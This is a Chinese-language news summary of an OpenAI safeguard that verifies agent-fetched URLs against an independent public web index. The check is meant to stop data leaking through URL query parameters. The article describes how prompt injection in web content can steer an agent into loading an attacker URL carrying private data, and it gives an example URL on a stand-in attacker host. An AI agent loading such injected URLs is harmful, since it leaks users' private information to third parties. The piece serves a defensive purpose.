OpenAI AI Agent 链接安全
OpenAI 已引入一项新的安全措施,以防止 AI 代理通过 URL 泄露敏感用户数据。通过仅限制自动 URL 获取为那些已知在网络上公开存在的地址,OpenAI 旨在减轻与 ChatGPT 中代理体验相关的基于 URL 的数据外泄风险。
防止基于 URL 的数据外泄
AI 代理可能被操纵为请求包含敏感用户信息的 URL——例如,电子邮件地址或文档标题——作为查询参数嵌入其中。由于网站会在其服务器日志中记录请求的 URL,即使模型没有在聊天中明确输出敏感信息,攻击者也可以捕获此私有数据。
此风险通过提示注入技术被放大,攻击者在网页内容中放置指令以覆盖模型行为并迫使代理加载特定的恶意 URL(例如,https://attacker.example/collect?data=<private_info>)。
传统信任列表的局限性
OpenAI 指出,简单的“受信任站点列表”或允许列表由于两个主要原因而不足:
- Redirects: 链接可能从受信任域开始,但会将代理重定向到攻击者控制的目标。
- User Experience: 严格的允许列表会产生过度的摩擦和“误报”,这可能导致用户忽略安全警告。
公开 URL 验证系统
为了确保 URL 不包含用户特定的秘密,OpenAI 使用一个独立的网络索引(爬虫),该索引在不访问用户对话、账户或个人数据的情况下发现公开的 URL。
当代理尝试自动检索 URL 时,系统会将该 URL 与此索引进行对比:
- 已验证的公开 URL: 如果 URL 与先前观察到的公开 URL 匹配,代理将自动加载它。
- 未验证的 URL: 如果未找到匹配项,则将 URL 视为未验证。代理可能被告知尝试不同的站点,或者系统将通过警告对话框要求显式用户操作。
用户界面和控制
当链接无法被验证为公开时,用户可能会看到一个警告,表明该链接未被验证,并且可能会与第三方站点共享对话数据。这可以防止“静默泄漏”,在这种情况中,模型否则可能会在用户不知情的情况下在后台加载资源。
范围和深度防御
此防护措施专门设计用于在资源获取过程中防止通过 URL 本身泄露用户特定数据。它不是解决所有网络安全问题的全面方案。具体而言,它不保证:
- 网页内容的可信度。
- 防御社会工程学攻击。
- 页面上存在误导或有害的指令。
OpenAI 将此视为更广泛的深度防御策略的一层,该策略包括针对提示注入的模型级缓解措施、产品控制、监控以及持续的红队演练。